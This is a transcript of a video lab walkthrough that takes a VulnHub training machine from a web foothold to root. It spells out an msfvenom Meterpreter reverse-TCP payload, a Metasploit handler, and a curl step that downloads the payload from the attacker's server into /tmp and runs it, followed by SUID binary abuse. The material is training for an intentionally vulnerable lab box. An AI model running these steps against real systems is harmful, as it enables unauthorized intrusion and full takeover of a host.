Privilege Escalation Walkthrough: Linux

Difficulty
Intermediate
Video Transcription
00:00
Welcome to part two of the privilege escalation lab. Now we're going to focus on the Linux box.
00:08
So I hinted that it is a web-based foothold.
00:12
So we'll just go to this in a browser.
00:16
192168
00:19
one
00:20
1- five. Now
00:22
the name of this box is escalate.
00:25
So it's a VulnHub box. If you want to
00:29
research this with other walkthroughs, I suggest that. I'm just gonna do one exploitation path
00:36
to get to root. There are apparently 11 others,
00:40
So try all 11 if you want to.
00:43
Um, but this is how you get better, right? Through practice.
00:49
So, okay, so now I wanna, I could use dirb on this.
00:56
dirb.
00:58
I told you I like to use WhatWeb to see the technology. Of course we already know this is Apache,
01:03
but still, WhatWeb.
01:10
Mhm.
01:11
See what we are.
01:18
Okay. Nothing, nothing earth-shattering here. We see it's Ubuntu.
01:25
So if I run dirb
01:34
and I specify for extension PHP
01:42
we see we have shell.php. Well, that makes things really easy.
01:49
Yeah,
01:53
So we're user6.
01:55
Okay, well let's get a foothold on this machine.
01:59
Okay. I said, I don't know. PHP shells aren't the best. So I'm gonna use msfvenom.
02:07
Payload is going to be Linux x86.
02:13
We can do Meterpreter. Let's mix things up here.
02:17
Reverse
02:19
TCP
02:21
LHOST
02:23
192.168.1.50
02:25
LPORT equals
02:30
4321
02:32
format is elf.
02:37
shell.elf.
02:43
So because I'm using Meterpreter, I now have to use
02:46
Metasploit
02:52
so I can split this.
02:54
I am going to do msfconsole
03:05
now if you use multi handler, right.
03:09
Use exploit multi handler
03:15
set
03:19
payload
03:27
set LHOST 192.168.1.
03:31
50, set LPORT
03:36
4321
03:43
show options
03:46
looks right. You run and set this as a job in the background.
03:53
So now what would I need to do again is set up my
04:00
little server here,
04:11
don't specify another port, you can do that.
04:14
So now it's on Port 8888.
04:17
So what I can do from here
04:23
is I can
04:26
make sure that.
04:29
Okay this is on the desktop
04:33
curl http
04:36
192.168.1.50
04:40
8888 shell
04:44
elf
04:45
output.
04:46
If you try to get this in this directory, it's not going to work. You don't have permission. So I always like to put things in temp
04:53
because it's globally readable, writable, executable. All right.
04:58
So first I have to ask that work
05:03
and we see the GET request here.
05:08
So if you want to verify that, we of course can do
05:13
ls.
05:14
And we see
05:15
that it's there. We did some odd this now
05:19
To let it execute, chmod 777.
05:24
Okay.
05:27
And now let's hope that
05:30
we can make this execute. It looks like it did.
05:34
All right.
05:39
So our sessions
05:44
session one.
05:46
Okay.
05:47
Let's drop into a shell.
05:49
Now you notice this is not the best shell in the world.
05:53
So what I want to do is /bin/bash -i
05:58
and that's much nicer, isn't it?
06:00
So I want to look for SUID binaries. That's something that I like to do. I don't know what my password is, right? So if I do sudo -l
06:10
well, it says no TTY present
06:13
so
06:14
even though this looks nice, it's still a bad shell in my opinion.
06:17
Yeah,
06:17
but let's try to find SUID binaries
06:24
and this is how you do it
06:28
as soo ID
06:30
type
06:31
F.
06:33
And again, I think the bible for this or the manual is g0tmi1k's
06:40
Linux privilege escalation guide.
06:53
We'll see something interesting towards the end here.
07:01
Okay. I see something called shell.
07:05
Is this a SUID binary?
07:08
And who owns it?
07:10
Yeah,
07:13
we see root owns this and we see a little s
07:15
here. Okay.
07:17
And we see that we can execute it.
07:21
So what if we do that?
07:40
You can always see what this is: file shell.
07:46
ELF.
07:46
Do strings if you want,
07:50
see what's going on in here
08:03
and we can always run this.
08:09
And we are root.
08:13
So that's only one way. There are many, many others. And I would highly recommend
08:18
that you explore all those other ways to escalate privileges on this box and that's why I chose it because there's just so many different ways to do it.
08:26
So go ahead and find your own way to get to root on this box.
08:31
Good luck.